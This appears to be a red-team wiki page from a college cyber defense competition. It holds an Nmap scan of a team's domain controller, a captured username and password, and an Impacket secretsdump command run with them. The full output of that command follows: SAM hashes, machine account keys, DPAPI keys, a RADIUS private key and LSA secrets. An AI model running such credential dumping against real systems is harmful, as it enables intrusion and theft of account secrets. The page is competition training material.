Team 7 Wiki Page

# Nmap 7.93 scan initiated Sat Dec  6 08:24:42 2025

Nmap scan report for ad.team7.isucdc.com (49.49.33.10)

Host is up (0.012s latency).

rDNS record for 49.49.33.10: mx-ll-49.49.33-10.dynamic.3bb.in.th

Not shown: 65532 filtered tcp ports (no-response)

PORT     STATE SERVICE       VERSION

53/tcp   open  domain        Unbound 1.23.1

80/tcp   open  http          OPNsense

|_http-server-header: OPNsense

| fingerprint-strings: 

|   GetRequest: 

|     HTTP/1.0 200 OK

|     Set-Cookie: PHPSESSID=7605ac5d7f5daafd3b93f54f39f34d32; path=/; HttpOnly; SameSite=Lax

|     Set-Cookie: PHPSESSID=7605ac5d7f5daafd3b93f54f39f34d32; path=/; HttpOnly

|     Expires: Thu, 19 Nov 1981 08:52:00 GMT

|     Cache-Control: no-store, no-cache, must-revalidate

|     Pragma: no-cache

|     Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline' 'unsafe-eval';

|     X-Frame-Options: SAMEORIGIN

|     X-Content-Type-Options: nosniff

|     X-XSS-Protection: 1; mode=block

|     Referrer-Policy: same-origin

|     Content-type: text/html; charset=UTF-8

|     Content-Length: 1603

|     Connection: close

|     Date: Sat, 06 Dec 2025 14:31:16 GMT

|     Server: OPNsense

|     

|     

|     

|     

|     

|     

|   HTTPOptions: 

|     HTTP/1.0 403 Forbidden

|     Set-Cookie: PHPSESSID=661a945e47ac38936df10e661f5b59cf; path=/; HttpOnly; SameSite=Lax

|     Expires: Thu, 19 Nov 1981 08:52:00 GMT

|     Cache-Control: no-store, no-cache, must-revalidate

|     Pragma: no-cache

|     Content-type: text/html; charset=UTF-8

|     Content-Length: 553

|     Connection: close

|     Date: Sat, 06 Dec 2025 14:31:16 GMT

|     Server: OPNsense

|     CSRF check failed

|     </div><div>|     document ).ready(function() {</div><div>|     $.ajaxSetup({</div><div>|     'beforeSend': function(xhr) {</div><div>|     xhr.setRequestHeader("X-CSRFToken", "YXhxWr2mbQEWCkbDiMxj0A" );</div><div>|     

|     

|     

|_    CSRF check failed. Your form session may have expired, or you may not have cookies enabled.

3389/tcp open  ms-wbt-server Microsoft Terminal Services

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port80-TCP:V=7.93%I=7%D=12/6%Time=69343E5D%P=i686-pc-windows-windows%r(

SF:GetRequest,8FA,"HTTP/1\.0\x20200\x20OK\r\nSet-Cookie:\x20PHPSESSID=7605

SF:ac5d7f5daafd3b93f54f39f34d32;\x20path=/;\x20HttpOnly;\x20SameSite=Lax\r

SF:\nSet-Cookie:\x20PHPSESSID=7605ac5d7f5daafd3b93f54f39f34d32;\x20path=/;

SF:\x20HttpOnly\r\nExpires:\x20Thu,\x2019\x20Nov\x201981\x2008:52:00\x20GM

SF:T\r\nCache-Control:\x20no-store,\x20no-cache,\x20must-revalidate\r\nPra

SF:gma:\x20no-cache\r\nContent-Security-Policy:\x20default-src\x20'self';\

SF:x20script-src\x20'self'\x20'unsafe-inline'\x20'unsafe-eval';\x20style-s

SF:rc\x20'self'\x20'unsafe-inline'\x20'unsafe-eval';\r\nX-Frame-Options:\x

SF:20SAMEORIGIN\r\nX-Content-Type-Options:\x20nosniff\r\nX-XSS-Protection:

SF:\x201;\x20mode=block\r\nReferrer-Policy:\x20same-origin\r\nContent-type

SF::\x20text/html;\x20charset=UTF-8\r\nContent-Length:\x201603\r\nConnecti

SF:on:\x20close\r\nDate:\x20Sat,\x2006\x20Dec\x202025\x2014:31:16\x20GMT\r

SF:\nServer:\x20OPNsense\r\n\r\n\n

2025-12-06_09:58:46  david.ward, ved757dup, From: 

./secretsdump.py TEAM7/david.ward:ved757dup@ad.team7.isucdc.com
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x558d2300c893a304210d94e2a792d180
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
TEAM7\AD$:aes256-cts-hmac-sha1-96:2028099ae5f916e20b47958141b038cb0a56b915bca40a36e5e4abe6415e014b
TEAM7\AD$:aes128-cts-hmac-sha1-96:ade7299fac5a1e1730ef63c1b55e1f69
TEAM7\AD$:des-cbc-md5:4a2ca4b508dc4ab3
TEAM7\AD$:plain_password_hex:6d3b5852e4c67ccb9ea48710c7699893e77cf54711164d8881f5ada45410376fbe18c99964fcc9f36c9317d58b0646452828907f2a37cdba4ba29f723a76b5fe5fae84db5101eaf83d52f100969b4f38e17e1f041a93a29572b2f871d427af0683681186cb6b2ade67efdcf715a600ef15b6f39d9d93ebacd3bc3551ee063b543a66dad5520fd6f41abdd834e5e1b6db01484caadf710ec30a3779913f3d9e6b8eb5392ceb836ab0e06c1a73884dce9b764f2c961634198b7eeef504f95f5f2775764099e54451f30d9e56eb91d880c2dada4b9944cc30913fae248ff2a9459bfa18a2ebea6781460aeebdf3fbb7960c
TEAM7\AD$:aad3b435b51404eeaad3b435b51404ee:88ed76f316a849a4937d007bac793166:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb156a10e29b5cdb86f660d2eff55b34f9b30eca9
dpapi_userkey:0x1bae462c2744e6bb587e92bf6ab48bb1262f1c47
[*] G$MSRADIUSPRIVKEY 
 0000   BC CF D3 A8 51 63 0E 5C  7B 10 26 87 DF 66 09 40   ....Qc.\{.&..f.@
 0010   96 0B B5 BD FE 34 CA 80  A8 DC C9 B5 48 A6 61 F4   .....4......H.a.
 0020   7A 8A 83 37 4E E6 E1 5F  6E EB B6 DC 3A 86 59 76   z..7N.._n...:.Yv
 0030   CD 4C 47 B8 9E 98 FC 6C  3C FE 33 54 EE 37 51 73   .LG....l<.3T.7Qs
 0040   0A 66 36 4A CF 46 65 62  BF 4C C1 F7 CF 9A F8 97   .f6J.Feb.L......
 0050   36 9D 0D 0B BC 24 C9 5C  66 37 49 C3 7A 3D F1 AD   6....$.\f7I.z=..
 0060   AA B6 92 B3 E1 FF 08 7A  78 70 8F CB 31 F9 F1 A4   .......zxp..1...
 0070   86 5B 0C 5B E8 8E 2B F6  13 2F 4C 1C 1B 71 AA 39   .[.[..+../L..q.9
 0080   10 82 C7 EF AC 0E F8 C4  FE 24 BC 4C 6C 94 B4 6D   .........$.Ll..m
 0090   AC 89 D9 9E 13 59 E8 FF  A4 EC AA 46 4A A6 80 09   .....Y.....FJ...
 00a0   4A 3E 91 01 D5 75 5C 2D  7D 3D 3B 50 65 41 1C 4B   J>...u\-}=;PeA.K
 00b0   73 5B 1C 94 50 4C 79 AE  D6 B2 FC 61 56 31 3D 74   s[..PLy....aV1=t
 00c0   53 46 EA 11 31 16 35 F1  5E 2A 6B 00 DB A7 D0 31   SF..1.5.^*k....1
 00d0   5A 88 F6 79 64 41 5A 58  1B 4D D7 9B 19 1D 35 79   Z..ydAZX.M....5y
 00e0   F4 76 5C 62 86 72 1F 52  34 B0 4E E2 A1 85 32 F4   .v\b.r.R4.N...2.
 00f0   A5 AC 25 8C 22 60 E1 43  9C 4D BE 9B 02 AC A7 0A   ..%."`.C.M......
G$MSRADIUSPRIVKEY:bccfd3a851630e5c7b102687df660940960bb5bdfe34ca80a8dcc9b548a661f47a8a83374ee6e15f6eebb6dc3a865976cd4c47b89e98fc6c3cfe3354ee3751730a66364acf466562bf4cc1f7cf9af897369d0d0bbc24c95c663749c37a3df1adaab692b3e1ff087a78708fcb31f9f1a4865b0c5be88e2bf6132f4c1c1b71aa391082c7efac0ef8c4fe24bc4c6c94b46dac89d99e1359e8ffa4ecaa464aa680094a3e9101d5755c2d7d3d3b5065411c4b735b1c94504c79aed6b2fc6156313d745346ea11311635f15e2a6b00dba7d0315a88f67964415a581b4dd79b191d3579f4765c6286721f5234b04ee2a18532f4a5ac258c2260e1439c4dbe9b02aca70a
[*] NL$KM 
 0000   CB 29 1A AF 7D BF E8 20  69 E8 D9 9E 40 DB 0D 6D   .)..}.. i...@..m
 0010   7D C2 53 C4 DF 55 27 23  E8 DF 5A A9 91 37 9E 38   }.S..U'#..Z..7.8
 0020   4B E2 7D B6 92 89 11 38  93 D5 08 B1 93 A3 3B EF   K.}....8......;.
 0030   8C 80 6B 25 D5 4B FE 41  1B 43 3C 43 AF 93 70 A2   ..k%.K.A.C<C..p.
NL$KM:cb291aaf7dbfe82069e8d99e40db0d6d7dc253c4df552723e8df5aa991379e384be27db69289113893d508b193a33bef8c806b25d54bfe411b433c43af9370a2
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] Could not connect: timed out
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...